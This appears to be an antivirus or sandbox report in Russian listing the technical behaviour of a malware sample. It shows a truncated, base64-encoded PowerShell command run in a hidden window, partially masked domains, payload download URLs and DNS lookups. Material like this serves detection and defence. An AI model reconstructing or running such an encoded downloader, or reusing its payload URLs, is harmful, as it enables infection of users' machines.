Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDAGYAdQB2AGoAcgBlAD0AKAAoACcASgB0ACcAKwAnAGMAbAB5ACcAKQArACcAbgA5ACcAKQA7ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAdABlAE0AcABcAHcAbwBSAEQAXAAyADAAMQA5AFwAIAAtAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
- %TEMP%\682909.cvr
- 'az###tours.com':80
- 'az###tours.com':443
- 'ey####lumedya.com':443
- 'zg##iji.com':80
- 'av####rnaments.com':443
- 'ar####etiawan.com':80
- http://az###tours.com/wp-admin/h/
- http://zg##iji.com/uc_client/a/
- http://www.zg##iji.com/uc_client/a/
- http://ar####etiawan.com/emakbelajarmasak.com/8/
- 'az###tours.com':443
- 'ey####lumedya.com':443
- 'av####rnaments.com':443
- DNS ASK pi###actinc.com
- DNS ASK az###tours.com
- DNS ASK ca####nacanullo.com
- DNS ASK ey####lumedya.com
- DNS ASK zg##iji.com
- DNS ASK av####rnaments.com
- DNS ASK ar####etiawan.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABDAGYAdQB2AGoAcgBlAD0AKAAoACcASgB0ACcAKwAnAGMAbAB5ACcAKQArACcAbgA5ACcAKQA7ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAdABlAE0AcABcAHcAbwBSAEQAXAAyADAAMQA5AFwAIAAtAG... (со скрытым окном)